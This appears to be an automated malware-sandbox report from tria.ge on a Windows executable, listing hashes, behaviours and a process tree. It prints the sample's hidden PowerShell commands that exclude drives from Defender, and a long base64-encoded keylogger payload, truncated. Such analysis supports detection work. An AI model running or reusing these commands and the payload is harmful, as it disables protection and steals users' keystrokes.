Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
125s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
26/06/2024, 20:32
Static task
static1
Behavioral task
behavioral1
Sample
2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
Resource
win10v2004-20240611-en
Behavioral task
behavioral3
Sample
2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
Resource
win11-20240508-en
General
-
Target
2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
-
Size
428KB
-
MD5
2a90a7ccf98e12ba57583e1e012eca18
-
SHA1
66512ffb8c58d1444622ff64f189cd7db7dbde1d
-
SHA256
2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8
-
SHA512
b7fbfbfc94c06337fd7bcf933f73f39d3c1aa7f17b4708e846e4ba64cab59249736e8733b8a627ed5292e568cfd5e0106275cec8b8dded8fd71cb60e285a72e5
-
SSDEEP
6144:1OYGXaPNxdgSdcq2pVZPOJHAbK/egjnOtOjgndbpZgBJDEFdkYnC:xGqN/XdctpVtkPewnOtHd98EQYC
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1672 2672 wscript.exe 85 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1228 2672 powershell.exe 85 -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 3928 powershell.exe 1228 powershell.exe 3960 powershell.exe 3960 powershell.exe 3928 powershell.exe -
Deletes itself 1 IoCs
pid Process 1792 wscript.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Loads dropped DLL 1 IoCs
pid Process 4488 regsvr32.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\DynamicWrapperX\CLSID regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinNT\test = "1" wscript.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\WOW6432Node\CLSID regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC} regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\dynwrapx.dll" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinNT wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinNT wscript.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32 regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\WOW6432Node regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\DynamicWrapperX regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3960 powershell.exe 3928 powershell.exe 3960 powershell.exe 3928 powershell.exe 1228 powershell.exe 1228 powershell.exe 1228 powershell.exe 1228 powershell.exe 1228 powershell.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1792 wscript.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3960 powershell.exe Token: SeDebugPrivilege 3928 powershell.exe Token: SeDebugPrivilege 1228 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1228 powershell.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 1620 wrote to memory of 4124 1620 2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe 77 PID 1620 wrote to memory of 4124 1620 2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe 77 PID 1620 wrote to memory of 4124 1620 2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe 77 PID 4124 wrote to memory of 3960 4124 cmd.exe 79 PID 4124 wrote to memory of 3960 4124 cmd.exe 79 PID 4124 wrote to memory of 3960 4124 cmd.exe 79 PID 4124 wrote to memory of 1792 4124 cmd.exe 81 PID 4124 wrote to memory of 1792 4124 cmd.exe 81 PID 4124 wrote to memory of 1792 4124 cmd.exe 81 PID 1792 wrote to memory of 3928 1792 wscript.exe 83 PID 1792 wrote to memory of 3928 1792 wscript.exe 83 PID 1792 wrote to memory of 3928 1792 wscript.exe 83 PID 1792 wrote to memory of 4488 1792 wscript.exe 87 PID 1792 wrote to memory of 4488 1792 wscript.exe 87 PID 1792 wrote to memory of 4488 1792 wscript.exe 87 PID 1228 wrote to memory of 1988 1228 powershell.exe 90 PID 1228 wrote to memory of 1988 1228 powershell.exe 90 PID 1988 wrote to memory of 4796 1988 csc.exe 91 PID 1988 wrote to memory of 4796 1988 csc.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe"C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 14438590 76 "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe")2⤵
- Suspicious use of WriteProcessMemory
PID:4124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3960
-
-
C:\Windows\SysWOW64\wscript.exewscript.exe /E:jscript 14438590 76 "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe"3⤵
- Deletes itself
- Modifies registry class
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /i /s "C:\Users\Admin\AppData\Local\dynwrapx.dll"4⤵
- Loads dropped DLL
- Modifies registry class
PID:4488
-
-
-
-
C:\Windows\SysWOW64\wscript.exeC:\Windows\SysWOW64\wscript.exe "C:\Users\Admin\AppData\Local\337b936d0.js" 761⤵
- Process spawned unexpected child process
- Modifies registry class
PID:1672
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc QQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAATQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEkATwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEEAYwBjAGUAcwBzAEMAbwBuAHQAcgBvAGwAOwBuAGEAbQBlAHMAcABhAGMAZQAgAGgAMQB7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABtADIAewBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABpADMAIABhADQAIAA9ACAAagA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAbwA2ACAAagA3ACAAPQAgAHAAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAawA5ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABsADEAMAAgAGcAMQAxADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGwAMQAyADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAG8AMQAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGkAMQA0ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYAMQA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYAMQA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGUAMQA3ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABrADEAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYwAxADkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAG8AMgAwADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABqADIAMQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAcAAyADIAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGIAMgAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABsADIANAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYQAyADUAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGwAMgA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABlADIANwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAG8AMgA4AHsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAGcAMgA5ADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGQAMwAwADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGwAMwAxADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGsAMwAyADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGwAMwAzADsAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBCAHkAVgBhAGwAQQByAHIAYQB5ACwAIABTAGkAegBlAEMAbwBuAHMAdAAgAD0AIAAzADYAKQBdAHAAdQBiAGwAaQBjACAAYgB5AHQAZQBbAF0AIABkADMANAA7AH0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIABSAHUAbgAoAGwAMQAwACAAYwAzADUAKQB7AGcAMQAxACAAPQAgAGMAMwA1ADsAZQAxADcAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGMAMQA5ACAAPQAgACIAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwBcAFwARABXAE0AIgA7AG8AMgAwACAAPQAgACIASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAXAAiACAAKwAgAGMAMQA5ADsAbAAyADYAIAA9ACAARQBuAHYAaQByAG8AbgBtAGUAbgB0AC4ARwBlAHQARQBuAHYAaQByAG8AbgBtAGUAbgB0AFYAYQByAGkAYQBiAGwAZQAoACIAaABlAHgAOAA7ACIAKQA7AGkAZgAgACgAbAAyADYAIAA9AD0AIABuAHUAbABsACkAIABsADIANgAgAD0AIAAiADEAMgAzADQANQA2ADcAOAAiADsAagAyADEAIAA9ACAAbAAyADYAIAArACAAIgBhACIAOwBwADIAMgAgAD0AIABsADIANgAgACsAIAAiAGQAIgA7AGIAMgAzACAAPQAgAGwAMgA2ACAAKwAgACIAcwAiADsAbAAyADQAIAA9ACAAbAAyADYAIAArACAAIgBtACIAOwB1AGkAbgB0ACAAaAAzADYAIAA9ACAATwBwAGUAbgBNAHUAdABlAHgAKAAwAHgAMAAwADEAMAAwADAAMAAwACwAIABmAGEAbABzAGUALAAgAGwAMgA0ACkAOwBpAGYAIAAoAGgAMwA2ACAAIQA9ACAAMAApACAARQB4AGkAdABQAHIAbwBjAGUAcwBzACgAMAApADsAQwByAGUAYQB0AGUATQB1AHQAZQB4ACgASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIAB0AHIAdQBlACwAIABsADIANAApADsAZQAyADcAIAA9ACAASQBuAHQAUAB0AHIALgBaAGUAcgBvADsAaQBmACAAKABTAEMAYQByAGQARQBzAHQAYQBiAGwAaQBzAGgAQwBvAG4AdABlAHgAdAAoADIALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIABvAHUAdAAgAGUAMgA3ACkAIAAhAD0AIAAwACkAIABlADIANwAgAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AOwBrADEAOAAgAD0AIAAiACIAOwBvADEAMwAgAD0AIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAG8AMQAzACkAOwBmADEANgAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKABtADMANwAgACsAIAAxACkAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAbwAxADMALAAgAGYAMQA2ACwAIABtADMANwAgACsAIAAxACkAOwB1AGkAbgB0ACAAaQAxADQAIAA9ACAAMAA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAaAByAGUAYQBkAFAAcgBvAGMAZQBzAHMASQBkACgAbwAxADMALAAgAHIAZQBmACAAaQAxADQAKQA7AFAAcgBvAGMAZQBzAHMAIABlADMAOAAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAGkAMQA0ACkAOwBpAGYAIAAoAGUAMwA4ACAAIQA9ACAAbgB1AGwAbAApACAAYQAyADUAIAA9ACAAZQAzADgALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwAgAGUAbABzAGUAIABhADIANQAgAD0AIAAiACIAOwBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAAMAAsACAAagA3ACwAIABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgADAALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwApADsAawA5ACAAPQAgAGkAMwA5ACgAYQA0ACkAOwBBAHAAcABsAGkAYwBhAHQAaQBvAG4ALgBSAHUAbgAoACkAOwBVAG4AaABvAG8AawBXAGkAbgBkAG8AdwBzAEgAbwBvAGsARQB4ACgAawA5ACkAOwB9AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAaQAzADkAKABpADMAIABhADQAKQB7AEkAbgB0AFAAdAByACAAZAA0ADAAIAA9ACAARwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUAKABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBNAG8AZAB1AGwAZQBOAGEAbQBlACkAOwByAGUAdAB1AHIAbgAgAFMAZQB0AFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKAAxADMALAAgAGEANAAsACAAZAA0ADAALAAgADAAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdgBvAGkAZAAgAG4ANAAxACgAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYANAAyACwAIABzAHQAcgBpAG4AZwAgAGYANAAzACwAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAagA0ADQAKQB7AHQAcgB5AHsAcwB0AHIAaQBuAGcAIABuADQANQBkAGEAdABhAF8AIAA9ACAAUgBlAGcAaQBzAHQAcgB5AC4ARwBlAHQAVgBhAGwAdQBlACgAbwAyADAALAAgAGoAMgAxACwAIAAiACIAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwBuADQANQBkAGEAdABhAF8AIAA9ACAAbgA0ADUAZABhAHQAYQBfACAAKwAgAEQAYQB0AGUAVABpAG0AZQAuAE4AbwB3ACAAKwAgACIAIABbACIAIAArACAAZgA0ADIALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIAXQAgAC0AIAAiACAAKwAgAGYANAAzACAAKwAgACIAXAByAFwAbgAiACAAKwAgAGoANAA0AC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAiAFwAcgBcAG4AXAByAFwAbgAiADsAUgBlAGcAaQBzAHQAcgB5AC4AUwBlAHQAVgBhAGwAdQBlACgAbwAyADAALAAgAGoAMgAxACwAIABuADQANQBkAGEAdABhAF8AKQA7AH0AYwBhAHQAYwBoACAAewAgAH0AfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABpAG4AdAAgAGEANAA2ACgASQBuAHQAUAB0AHIAIABnADQANwApAHsAcgBlAHQAdQByAG4AIABNAGEAcgBzAGgAYQBsAC4AUgBlAGEAZABJAG4AdAAzADIAKABnADQANwApADsAfQBwAHIAaQB2AGEAdABlACAAZABlAGwAZQBnAGEAdABlACAASQBuAHQAUAB0AHIAIABpADMAKABpAG4AdAAgAG4ANAA4ACwAIABJAG4AdABQAHQAcgAgAGYANAA5ACwAIABJAG4AdABQAHQAcgAgAG4ANQAwACkAOwBwAHUAYgBsAGkAYwAgAGQAZQBsAGUAZwBhAHQAZQAgAHUAaQBuAHQAIABvADYAKABJAG4AdABQAHQAcgAgAHAAUABhAHIAYQBtACkAOwBwAHUAYgBsAGkAYwAgAGQAZQBsAGUAZwBhAHQAZQAgAHYAbwBpAGQAIABsADEAMAAoACkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABJAG4AdABQAHQAcgAgAGoANQAoAGkAbgB0ACAAbgA0ADgALAAgAEkAbgB0AFAAdAByACAAZgA0ADkALAAgAEkAbgB0AFAAdAByACAAbgA1ADAAKQB7AGkAZgAgACgAbgA0ADgAIAA+AD0AIAAwACAAJgAmACAAZgA0ADkAIAA9AD0AIAAoAEkAbgB0AFAAdAByACkAMAB4ADAAMQAwADAAKQB7AGkAbgB0ACAAZQA1ADEAIAA9ACAAYQA0ADYAKABuADUAMAApADsAaQBmACAAKABlADUAMQAgADwAIAA4ACkAIAByAGUAdAB1AHIAbgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAGsAOQAsACAAbgA0ADgALAAgAGYANAA5ACwAIABuADUAMAApADsAZwAxADEAKAApADsAYgBvAG8AbAAgAGEANQAyACAAPQAgACgAZQA1ADEAIAA9AD0AIAA4ACkAOwBiAG8AbwBsACAAZAA1ADMAIAA9ACAAKABlADUAMQAgAD0APQAgADQANgApADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGoANQA0ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoACkAOwBiAHkAdABlAFsAXQAgAGcANQA1ACAAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAMgA1ADUAXQA7AGkAZgAgACgARwBlAHQASwBlAHkAYgBvAGEAcgBkAFMAdABhAHQAZQAoAGcANQA1ACkAKQB7AHUAaQBuAHQAIABqADUANgAgAD0AIABNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACgAZQA1ADEALAAgADMAKQA7AGwAMQAyACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAdQBpAG4AdAAgAGUANQA3ACAAPQAgADAAOwB1AGkAbgB0ACAAaQA1ADgAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABsADEAMgAsACAAcgBlAGYAIABlADUANwApADsAdQBpAG4AdAAgAGgANQA5ACAAPQAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABMAGEAeQBvAHUAdAAoAGkANQA4ACkAOwBpAGYAIAAoAGEANQAyACAAfAB8ACAAZAA1ADMAIAB8AHwAIAAoAFQAbwBVAG4AaQBjAG8AZABlAEUAeAAoAGUANQAxACwAIABqADUANgAsACAAZwA1ADUALAAgAGoANQA0ACwAIABqADUANAAuAEMAYQBwAGEAYwBpAHQAeQAsACAAKAB1AGkAbgB0ACkAMAAsACAAaAA1ADkAKQAgAD4AIAAwACkAKQB7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAGwAMQAyACkAOwBmADEANQAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKABtADMANwAgACsAIAAxACkAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAbAAxADIALAAgAGYAMQA1ACwAIABtADMANwAgACsAIAAxACkAOwBpAGYAIAAoACgAZQA1ADcAIAAhAD0AIABpADEANAApACAAfAB8ACAAKABsADEAMgAgACEAPQAgAG8AMQAzACkAIAB8AHwAIAAoAGYAMQA2AC4AVABvAFMAdAByAGkAbgBnACgAKQAgACEAPQAgAGYAMQA1AC4AVABvAFMAdAByAGkAbgBnACgAKQApACkAewBuADQAMQAoAGYAMQA2ACwAIABhADIANQAsACAAZQAxADcAKQA7AGYAMQA2AC4AUgBlAG0AbwB2AGUAKAAwACwAIABmADEANgAuAEwAZQBuAGcAdABoACkAOwBmADEANgAuAEEAcABwAGUAbgBkACgAZgAxADUAKQA7AGUAMQA3AC4AUgBlAG0AbwB2AGUAKAAwACwAIABlADEANwAuAEwAZQBuAGcAdABoACkAOwBvADEAMwAgAD0AIABsADEAMgA7AFAAcgBvAGMAZQBzAHMAIABlADMAOAAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAGUANQA3ACkAOwBpAGYAIAAoAGUAMwA4ACAAIQA9ACAAbgB1AGwAbAApACAAYQAyADUAIAA9ACAAZQAzADgALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwAgAGUAbABzAGUAIABhADIANQAgAD0AIAAiACIAOwBpADEANAAgAD0AIABlADUANwA7AH0AaQBmACAAKABlADUAMQAgAD4AIAA3ACkAewBpAGYAIAAoAGEANQAyACkAIABlADEANwAuAEEAcABwAGUAbgBkACgAIgBbAKsAXQAiACkAOwBlAGwAcwBlACAAaQBmACAAKABkADUAMwApACAAZQAxADcALgBBAHAAcABlAG4AZAAoACIAWwBkAGUAbABdACIAKQA7AGUAbABzAGUAIABlADEANwAuAEEAcABwAGUAbgBkACgAagA1ADQAKQA7AH0AfQB9AH0AcgBlAHQAdQByAG4AIABDAGEAbABsAE4AZQB4AHQASABvAG8AawBFAHgAKABrADkALAAgAG4ANAA4ACwAIABmADQAOQAsACAAbgA1ADAAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AIABqADYAMAAoAGIAeQB0AGUAWwBdACAAagA2ADEAKQB7AHMAdAByAGkAbgBnACAAbwA2ADIAIAA9ACAARQBuAGMAbwBkAGkAbgBnAC4AQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABqADYAMQApADsAaQBmACAAKABzAHQAcgBpAG4AZwAuAEkAcwBOAHUAbABsAE8AcgBFAG0AcAB0AHkAKABvADYAMgApACkAIAByAGUAdAB1AHIAbgAgAG4AZQB3ACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AKAApADsAcgBlAHQAdQByAG4AIABuAGUAdwAgAEwAaQBzAHQAPABzAHQAcgBpAG4AZwA+ACgAbwA2ADIALgBTAHAAbABpAHQAKABuAGUAdwAgAGMAaABhAHIAWwBdACAAewAgACcAXAAwACcAIAB9ACwAIABTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwAuAFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAHAAOAAoAEkAbgB0AFAAdAByACAAbQA2ADMAKQB7AGIAbwBvAGwAIABlADYANAAgAD0AIAB0AHIAdQBlADsAcwB0AHIAaQBuAGcAIABtADYANQA7AFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABqADYANgAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKAApADsAdwBoAGkAbABlACAAKABlADYANAApAHsAcwB0AHIAaQBuAGcAIABrADYANwAgAD0AIABSAGUAZwBpAHMAdAByAHkALgBHAGUAdABWAGEAbAB1AGUAKABvADIAMAAsACAAYgAyADMALAAgACIAIgApAC4AVABvAFMAdAByAGkAbgBnACgAKQA7AGkAZgAgACgAawA2ADcAIAAhAD0AIAAiACIAKQB7AFIAZQBnAGkAcwB0AHIAeQBLAGUAeQAgAGkANgA4ACAAPQAgAFIAZQBnAGkAcwB0AHIAeQAuAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAuAE8AcABlAG4AUwB1